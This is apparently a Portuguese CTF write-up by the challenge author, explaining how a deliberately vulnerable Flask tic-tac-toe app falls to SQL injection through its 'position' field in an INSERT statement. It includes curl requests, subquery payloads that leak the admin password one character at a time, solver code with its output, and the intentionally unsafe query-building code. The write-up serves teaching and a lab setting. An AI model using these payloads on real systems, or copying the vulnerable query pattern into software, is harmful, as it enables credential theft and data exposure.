bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Debug mode: off
## erro nas primeiras conexões (mostrando somente as linhas iniciais)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | Traceback (most recent call last):
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | File "/home/ttt/.local/lib/python3.10/site-packages/mysql/connector/connection_cext.py", line 263, in _open_connection
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | self._cmysql.connect(**cnx_kwargs)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | _mysql_connector.MySQLInterfaceError: Can't connect to MySQL server on 'jogo-da-velha-db:3306' (111)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 |
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | The above exception was the direct cause of the following exception:
...
## sucesso depois de alguns minutos
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:24:01.432841Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed.
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:24:01.432906Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel.
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:24:01.619661Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:24:01.619713Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.29' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 exited with code 1
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Serving Flask app 'app' (lazy loading)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Environment: production
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | WARNING: This is a development server. Do not use it in a production deployment.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | Use a production WSGI server instead.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Debug mode: off
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Running on all addresses (0.0.0.0)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | WARNING: This is a development server. Do not use it in a production deployment.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Running on http://127.0.0.1:5000
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Running on http://172.27.0.3:5000 (Press CTRL+C to quit)
Para testar a app funcionando, é só testar no navegador:
http://localhost:5000/
Antes de ler o resto do artigo com a solução, sugiro uma tentativa de hackear a aplicação e obter a senha do admin
.
Em uma App com o docker-compose.yml
disponível, vale dar uma olhada no arquivo pra entender alguns pontos importantes.
version: '3.7'
services:
jogo-da-velha-db:
image: mysql:8
restart: always
volumes:
- ./db/schema.sql:/docker-entrypoint-initdb.d/schema.sql:ro
environment:
- MYSQL_RANDOM_ROOT_PASSWORD=yes
- MYSQL_DATABASE=ttt
- MYSQL_USER=ttt
- MYSQL_PASSWORD=NAO_DISPONIVEL
tic-tac-toe:
build: .
restart: always
ports:
- 5000:5000
environment:
- MYSQL_DATABASE=ttt
- MYSQL_USER=ttt_app
- MYSQL_PASSWORD=simples
- MYSQL_HOST=jogo-da-velha-db
depends_on:
- jogo-da-velha-db
Resumo
A investigação do schema.sql
é interessante para entender como os dados são armazenados, além de trazer uma informação chave.
CREATE TABLE users (
id INTEGER PRIMARY KEY AUTO_INCREMENT,
username VARCHAR(32) NOT NULL UNIQUE,
password VARCHAR(100) NOT NULL,
created DATETIME DEFAULT CURRENT_TIMESTAMP
);
CREATE TABLE games (
id INTEGER PRIMARY KEY AUTO_INCREMENT,
game_key VARCHAR(36) NOT NULL UNIQUE,
user_id INTEGER NOT NULL,
winner CHAR(1) NOT NULL DEFAULT '?',
created DATETIME DEFAULT CURRENT_TIMESTAMP,
CHECK (winner IN ("X", "O", "?", "*"))
);
CREATE TABLE moves (
game_id INTEGER NOT NULL,
position INTEGER NOT NULL,
value CHAR(1) NOT NULL,
created DATETIME DEFAULT CURRENT_TIMESTAMP,
CHECK (value IN ("X", "O"))
);
INSERT INTO users (username, password)
VALUES ('admin', 'YmhhY2t7ZmxhZ19wYXJhX3Rlc3Rlc30K');
-- mais linhas abaixo
O objetivo, conforme a descrição do desafio, é pegar a senha do usuário admin
. Após avaliar brevemente o código, você percebe que a senha é armazenada no banco de dados, na tabela users
, para este usuário.
O formato dessa senha é base64 (não é necessário guess aqui - você vai perceber isso no código da aplicação).
Para verificar a senha de fato:
echo YmhhY2t7ZmxhZ19wYXJhX3Rlc3Rlc30K | base64 -d
bhack{flag_para_testes}
Resumo
users
), contendo a senha (e a flag!).games
), vinculados a um usuário.moves
), vinculados a um jogo, contendo a posição (position
) e o valor, (value
), que representa o jogador - X
ou O
.Já sabemos que a flag é a senha do usuário admin
, codificada como base64 em uma linha da tabela users
. O próximo passo aqui é dar uma olhada na aplicação e ver como ela interage com o banco pra ver como podemos recuperar a informação.
A aplicação - app.py - é construída em Python
, com o uso do framework web Flask
. Como o código tem 368 linhas, não vamos passar por cada uma aqui (ufa!).
A maior parte desse código tem um papel mais simples: fazer o jogo da velha funcionar. O foco será nos trechos de código com as vulnerabilidades que vamos explorar.
Algo que chama a atenção logo na primeira olhada é que a aplicação não usa bind variables
pra passar valores de parâmetros para os comandos SQL. Isso é uma falha grave, que dá pena de morte em alguns países.
Vamos observar, por exemplo, como o processo de login é tratado:
@app.route('/login', methods=['GET', 'POST'])
def login():
user_id, username = getuser()
if request.method == 'GET':
if not(user_id is None):
return redirect(url_for('index'))
return render_template('login.html', username=username)
if not(user_id is None):
return 'Already logged in', 400
username = request.form.get('username')
password = request.form.get('password')
try:
filter_param('username', username)
filter_param('password', password)
password = b64encode(bytes(password, 'UTF-8')).decode('UTF-8')
db, command = getdb()
command.execute(f'select id from users where username = "{username}" and password = "{password}"')
result = command.fetchone()
if result is None:
return 'Invalid Username or Password', 404
user_id = result[0]
if user_id is None:
return 'Invalid Username or Password', 404
command.close()
session['user_id'] = user_id
session['username'] = username
return redirect(url_for('index'))
except mysql.connector.errors.IntegrityError:
return 'Username already exists!', 400
except ValueError as valerr:
return f'DANGER: {valerr}', 400
except Exception as err:
traceback.print_exc()
return 'Internal Error!', 500
Na hora de chamar o comando SQL para validar o usuário e senha no banco, ele simplesmente concatena a string, conforme abaixo, colocando os valores entre aspas:
command.execute(f'select id from users where username = "{username}" and password = "{password}"')
Normalmente, isso indica um SQL Injection muito simples, onde o atacante pode enviar aspas no nome de usuário ou senha para injetar comandos SQL. Obs: não vou explicar o conceito básico de SQL Injection aqui, por ser algo bem conhecido e básico, mas deixo referências.
Apesar da péssima prática, os parâmetros são filtrados em linhas anteriores, pela função filter_param
.
filter_param('username', username)
filter_param('password', password)
Vamos entender o que faz essa função:
DANGER_CHARSET = '"\'\\;\n\r\t'
# ... várias linhas depois ...
def filter_param(name, value):
if not isinstance(value, str):
raise ValueError(f'Invalid parameter format for "{name}"!')
for ch in DANGER_CHARSET:
if ch in value:
raise ValueError(f'Invalid character in parameter "{name}"!')
if value.find('--') > 0 or value.find('/*') > 0:
raise ValueError(f'SQL comment not allowed in parameter "{name}"!')
Resumo
Com isso, EM TEORIA, a aplicação estaria protegida contra SQL Injections. Vamos testar a teoria, incluindo aspas no nome do usuário.
Ao clicar em Entrar
, ele gera o erro abaixo, interrompendo o processo de login.
DANGER: Invalid character in parameter "username"!
Embora a má prática seja terrível, ela parece estar bem cercada por um super filtro correto? Correto???
Com um pouquinho mais de análise, podemos ver um caso de SQL onde a função filter_param
está sendo executada, mas o SQL não está entre aspas!
def insert_move(current_moves, position, player):
game_id = current_moves['game_id']
try:
db, command = getdb()
command.execute(f'insert into moves (game_id, position, value) values ({game_id}, {position}, "{player}")')
db.commit()
command.close()
except mysql.connector.errors.IntegrityError:
raise ValueError('Invalid Move! Try Again')
Resumo
game_id
position
Analisando o código, verificamos que essa função é chamada na rota /game/<string:game_key>/move
, que recebe, via POST, o game_key
(UUID do jogo) na URL e a position
via body do POST.
@app.route('/game/<string:game_key>/move', methods=['POST'])
def move(game_key):
user_id, _ = getuser()
if user_id is None:
return 'You need to log in first', 400
param_position = request.form.get('position')
try:
filter_param('position', param_position)
position = param_position
except ValueError as valerr:
traceback.print_exc()
return f'Invalid Position for Move', 400
try:
filter_param('game_key', game_key)
uuid.UUID(game_key, version=4)
except ValueError:
return 'Invalid Game Key', 400
try:
moves = user_move(game_key, user_id, position)
except mysql.connector.errors.DatabaseError:
traceback.print_exc()
return 'Internal Error!', 500
except ValueError as valerr:
return f'{valerr}', 400
return jsonify(moves)
Resumo
position
e game_key
, via filter_param
game_key
é um UUIDv4 válido.user_move
, com os valores dos parâmetros enviados.Para terminar de entender o fluxo, é necessário mergulhar mais um nível e entender a função user_move
:
Obs: só o início da função interessa nesse momento.
def user_move(game_key, user_id, position):
current_moves = get_moves(game_key, user_id)
game_id = current_moves['game_id']
if current_moves['winner'] != '?':
raise ValueError(f'Game is over!')
# User Move
insert_move(current_moves, position, 'X')
# ... Resto da função ...
Podemos tentar usar o game_key
, mas como ele precisa ser um UUID válido, não parece haver muito espaço pra exploração aqui.
Por outro lado, o parâmetro position
é validado apenas para um grupo de caracteres envolvidos que fecham uma string, comentários ou fim de comando SQL, mas ela não valida se o position
é um número inteiro. Temos um possível SQLi.
Diferente do tradicional ' or ''='
, esse SQLi está em um INSERT, então ele está gravando o valor em algum local e não retornando os valores diretamente.
Vamos acompanhar esse request no navegador, pra simular o injection. (Usuários de Burp vão fazer isso de forma mais simples, mas vamos no modo artesanal).
Vamos iniciar um novo jogo na App, abrir o Developer Tools do Navegador (F12) e verificar o request enviado quando clicamos na primeira posição (canto superior esquerdo).
Após o clique, é enviado o request abaixo - note que eliminei vários headers irrelevantes para a análise.
POST /game/addb868e-429e-4ef2-b2d1-099ca950a346/move HTTP/1.1
Content-Length: 10
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Host: localhost:5000
position=1
O valor 1
para o position
indica o primeiro movimento do jogo. O SQL gerado fica assim:
insert into moves
(game_id, position, value)
values (1, 1, "X")
Resumo
game_id
, obtido da tabela games
, que não temos acesso.position
, que é justamente o nosso ponto de ataque.player
, que é fixo para os nossos movimentos.A resposta do request vem no formato JSON:
{
"O": [8],
"X": [1],
"game_id": 1,
"game_key": "addb868e-429e-4ef2-b2d1-099ca950a346",
"winner": "?"
}
Basicamente é um status do jogo, incluindo os movimentos de “X” (você), os movimentos de “O” (a máquina), o id do jogo, game_key e o vencedor (se houver - neste caso, o jogo ainda não foi finalizado).
Note que o valor 1
que enviamos veio como o primeiro movimento de X
.
Vamos tentar um próximo passo pra validar que conseguimos gerar um SQL aqui, enviando um valor 1+1
no position
, de forma que o SQL gerado fique assim:
insert into moves
(game_id, position, value)
values (1, 1+1, "X")
Esperamos, claro, que o valor gerado seja 2
.
Enviando com o curl
- com parâmetros URL Encoded
curl 'http://localhost:5000/game/8436bd1e-4436-4f41-8ea0-9d39da8d8036/move' \
-H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8' \
-H 'Cookie: session=eyJ1c2VyX2lkIjoyLCJ1c2VybmFtZSI6Im5lcHR1bmlhbjEifQ.Y5MZ8Q.jwVLLcNg7oQKDcVVC6ZC8lMol80' \
--data-raw 'position=1%2B1'
Resposta:
invalid literal for int() with base 10: '1+1'
Temos um erro aqui!!
Esse é um erro de Python (não de MySQL), que ocorre quando você chama a função int()
com um valor que não é inteiro - neste caso 1+1
.
Ele está ocorrendo aqui na linha 129, logo após a função insert_move
, que gera o SQL:
insert_move(current_moves, position, 'X')
current_moves['X'].append(int(position))
Isso causa a impressão de que o SQL Injection falhou, afinal recebemos um erro, MAS você pode ver que o movimento foi inserido de qualquer forma!
Apesar do retorno com erro nesse request, é possível verificar o status do jogo em outra rota: game/<game_key>/info
, que é chamada quando você carrega um jogo.
Resposta:
{
"O": [7],
"X": [1,2],
"game_id": 3,
"game_key": "addb868e-429e-4ef2-b2d1-099ca950a346",
"winner": "?"
}
O player X
agora tem os movimentos 1
e 2
, conforme o nosso plano diabólico.
Validamos que podemos incluir uma expressão. Podemos incluir um SQL? O importante é não incluir nenhum dos caracteres bloqueados (aspas, etc..).
Vamos testar a posição 3, mas agora usando uma subquery, com o payload:
position=(select 2+1)
Isso gera o SQL abaixo:
insert into moves
(game_id, position, value)
values (1, (select 2+1), "X")
Bora pra luta:
curl 'http://localhost:5000/game/8436bd1e-4436-4f41-8ea0-9d39da8d8036/move' \
-H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8' \
-H 'Cookie: session=eyJ1c2VyX2lkIjoyLCJ1c2VybmFtZSI6Im5lcHR1bmlhbjEifQ.Y5MZ8Q.jwVLLcNg7oQKDcVVC6ZC8lMol80' \
--data-raw 'position=(select%202%2B1)'
Recebemos a mesma resposta com erro Python, mas o /info
retorna:
{
"O": [7],
"X": [1,2,3],
"game_id": 3,
"game_key": "addb868e-429e-4ef2-b2d1-099ca950a346",
"winner": "?"
}
O X
agora inclui o valor 3
, resultado da subquery que inserimos. Ataque comprovado, ou seu dinheiro de volta.
Temos um SQL injection, mas ainda precisamos extrair a flag, que é a senha do Admin, codificada em base64.
Aqui temos uma limitação: só conseguimos inserir um valor inteiro, já que o campo POSITION
, da tabela moves
, é do tipo INTEGER
.
Nada que seja um problema, afinal podemos inserir várias linhas e representar qualquer informação digital como uma sequência de números ;)
Neste caso, podemos gravar o código de cada caractere da senha como um novo POSITION
. Em teoria, isso deveria ser um problema (posições já ocupadas), mas não tem uma constraint
no banco impedindo isso, então… tá pa noiz.
Vamos testar essa hipótese, injetando uma subquery que insere o código ASCII do primeiro caractere da senha do admin
. Como o admin
é o primeiro a ser incluído, o ID do usuário dele é 1
.
position=(select ord(substring(password, 1, 1)) from users where id = 1)
Obs: Dá pra buscar o usuário admin também pelo nome, mas aí você precisa fazer um bypass no bloqueio de aspas. Deixo como exercício.
O SQL gerado fica assim:
insert into moves
(game_id, position, value)
values (1, (select ord(substring(password, 1, 1)) from users where id = 1), "X")
Partiu curl
:
curl 'http://localhost:5000/game/8436bd1e-4436-4f41-8ea0-9d39da8d8036/move' \
-H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8' \
-H 'Cookie: session=eyJ1c2VyX2lkIjoyLCJ1c2VybmFtZSI6Im5lcHR1bmlhbjEifQ.Y5MZ8Q.jwVLLcNg7oQKDcVVC6ZC8lMol80' \
--data-raw 'position=(select%20ord(substring(password%2C%201%2C%201))%20from%20users%20where%20id%20%3D%201)'
Retorno do /info
:
{
"O": [7],
"X": [1,2,3,89],
"game_id": 3,
"game_key": "addb868e-429e-4ef2-b2d1-099ca950a346",
"winner": "?"
}
O número 89
é o ASCII da letra Y
. Veja que o Y
é a primeira letra do base64 do nosso ambiente simulado YmhhY2t7ZmxhZ19wYXJhX3Rlc3Rlc30K
.
Agora só temos que fazer isso pra cada caractere da senha. Mas pra isso, precisamos primeiro pegar o tamanho da senha, o que já está facinho.
Vamos direto pra subquery:
(select length(password) from users where id = 1)
Retorno:
{
"O": [7],
"X": [1,2,3,89,32],
"game_id": 3,
"game_key": "addb868e-429e-4ef2-b2d1-099ca950a346",
"winner": "?"
}
O último valor retornado é 32
, que é exatamente o tamanho da senha.
Com isso, o plano de ação fica assim:
admin
/game/<game_key>/info
/game/<game_key>/info
X
(mantendo a ordem).Bora exploitar.
Pra facilitar a rodada do exploit, vale começar o processo do zero, registrando um novo usuário e criando um novo jogo pra fazer esses passos, a estrutura básica fica assim:
def crackit():
register()
login()
game_key = newgame()
enc_pwd = get_encoded_password(game_key)
pwd = base64.b64decode(enc_pwd)
print(pwd)
Não vou explicar cada passo aqui, que o negócio já tá virando bíblia.
A função get_encoded_password
mostra a estrutura do nosso plano de ação:
def get_encoded_password(game_key):
size = insert_pwd_size(game_key)
encoded = brute_pwd(game_key, size)
result_str = ''
for code in encoded[1:]:
result_str += chr(code)
return result_str
Pegamos primeiro o tamanho da senha com a função insert_pwd_size
:
def insert_pwd_size(game_key):
data = {
'position': f'(select length(password) from users where id = 1)',
}
request(f'/game/{game_key}/move', data=data)
return int(get_my_moves(game_key)[0])
Depois inserimos o código de caractere por caractere com as funções brute_pwd
e insert_pwd_pos
(ignorando a saída):
def insert_pwd_pos(game_key, pwd_position):
data = {
'position': f'(select ord(substring(password, {pwd_position+1}, 1)) from users where id = 1)',
}
return request(f'/game/{game_key}/move', data=data)
def brute_pwd(game_key, size):
for pos in range(size):
insert_pwd_pos(game_key, pos)
return get_my_moves(game_key)
Depois de tudo inserido às cegas, mas com esperança, pegamos o resultado com a função get_my_moves
.
def get_my_moves(game_key):
response = request(f'/game/{game_key}/info', data=None, method='GET')
return response.json()['X']
A partir daí, já temos o nosso resultado em base64 pra decodificar. Bora rodar essa praga.
Obs: o código do solver.py aponta para http://localhost:5000
, que é o endereço ambiente local, definido no docker-compose.yml
.
Obs: vou resumir as linhas aqui porque a saída é grande.
$ python solver.py
==> REQUEST to http://localhost:5000/register
{'username': 'neptunianxxx715', 'password': 'neptunianpwdxxx715'}
RESPONSE: 200
# ... um monte de linhas
==> REQUEST to http://localhost:5000/newgame
{'None': 0}
RESPONSE: 200
{"game_key":"87228aac-decc-4911-be31-05c05aa78ca5"}
==> REQUEST to http://localhost:5000/game/87228aac-decc-4911-be31-05c05aa78ca5/move
{'position': '(select length(password) from users where id = 1)'}
RESPONSE: 400
invalid literal for int() with base 10: '(select length(password) from users where id = 1)'
==> REQUEST to http://localhost:5000/game/87228aac-decc-4911-be31-05c05aa78ca5/info
None
RESPONSE: 200
{"O":[],"X":[32],"game_id":7,"game_key":"87228aac-decc-4911-be31-05c05aa78ca5","winner":"?"}
==> REQUEST to http://localhost:5000/game/87228aac-decc-4911-be31-05c05aa78ca5/move
{'position': '(select ord(substring(password, 1, 1)) from users where id = 1)'}
==> REQUEST to http://localhost:5000/game/87228aac-decc-4911-be31-05c05aa78ca5/move
{'position': '(select ord(substring(password, 1, 1)) from users where id = 1)'}
RESPONSE: 400
invalid literal for int() with base 10: '(select ord(substring(password, 1, 1)) from users where id = 1)'
==> REQUEST to http://localhost:5000/game/87228aac-decc-4911-be31-05c05aa78ca5/move
{'position': '(select ord(substring(password, 2, 1)) from users where id = 1)'}
RESPONSE: 400
invalid literal for int() with base 10: '(select ord(substring(password, 2, 1)) from users where id = 1)'
# ... mais um bocadão de linhas
==> REQUEST to http://localhost:5000/game/87228aac-decc-4911-be31-05c05aa78ca5/info
None
RESPONSE: 200
{"O":[],"X":[32,89,109,104,104,89,50,116,55,90,109,120,104,90,49,57,119,89,88,74,104,88,51,82,108,99,51,82,108,99,51,48,75],"game_id":7,"game_key":"87228aac-decc-4911-be31-05c05aa78ca5","winner":"?"}
b'bhack{flag_para_testes}\n'
Pegamos a nossa flag (de testes locais)!!
Se você rodasse esse script, no dia do desafio, teria a flag para pontuar:
bhack{$qL1_m4njad0_M@$_d1v3rtE_749db6dd8b4a74a349a8a14a12b43d3f113fea67}
O código final completo do exploit, você encontra aqui: solver.py.
Foi extremamente interessante acompanhar o engajamento durante o CTF, porque ele acabou gerando bastante interesse de alguns times.
Infelizmente, em determinada situação, passamos a tomar erros, que geraram instabilidade no desafio:
MySQL Connection not available
Esse erro ocorre por algum problema relacionado ao pool de conexões que usamos nesse caso para o MySQL, o mysql.connector
.
Demos uma olhada mais geral no tema, mas ainda não conseguimos fôlego pra investigar com calma.
Mas é uma lição aprendida para próximos CTFs.
Por conta disso, foi necessário reiniciar o desafio várias vezes.
Ainda assim, foi uma excelente experência e fiquei com a impressão de que os times se divertiram e aprenderam bastante no processo.
O desafio teve uma solução e foi resolvido pelo time que ficou em primeiro lugar no CTF, o Cinquenta Tons de Vermelho
.
Não consegui ver os detalhes da solução com o time infelizmente, mas sei que foi um timing attack, com o uso da função sleep
no MySQL.
Não previ isso e curti demais :)
O único porém é que essa solução demandou um volume de requisições muito maior, porque foi preciso fazer brute em cada caractere, gastando mais tempo dos jogadores.
O timing attack também tem alguns riscos de precisão, fazendo com que o time tivesse que reexecutar o payload algumas vezes, pra revisitar caracteres que falharam.
Isso também acabou potencializando o bug do desafio, gerando mais necessidade de restarts.
De qualquer forma, isso tem mais a ver com a arquitetura do desafio em si. A solução do time foi bastante inteligente e criativa.
Valeu demais!
Foto: Artigo do Mente Binária
Fiquei na dúvida no início se fazia o desafio um pouco mais difícil.
Atualmente ele permite inserir quaisquer valores no campo position
, mas um fator dificultador seria restringir, em forma de constraint no banco de dados, apenas valores de 1 a 9. Uma outra restrição seria impedir valores repetidos em um jogo.
Isso tornaria necessário um brute-force char-by-char, via boolean-based search, abrindo vários jogos diferentes também (seria possível otimizar, mas dessa forma seria suficiente).
Outra abordagem seria um SQL Injection via username, criando uma sessão fake, através de um brute-force da secret key
do Flask.
Só que isso seria achismo demais:
Foi melhor abortar.
Exemplo de código vulnerável (user_id sem filtro):
command.execute(f'select id, winner from games where game_key = "{game_key}" and user_id = {user_id}')
bind variables
pra passar os valores ao invés de concatenção de strings.USERS
”.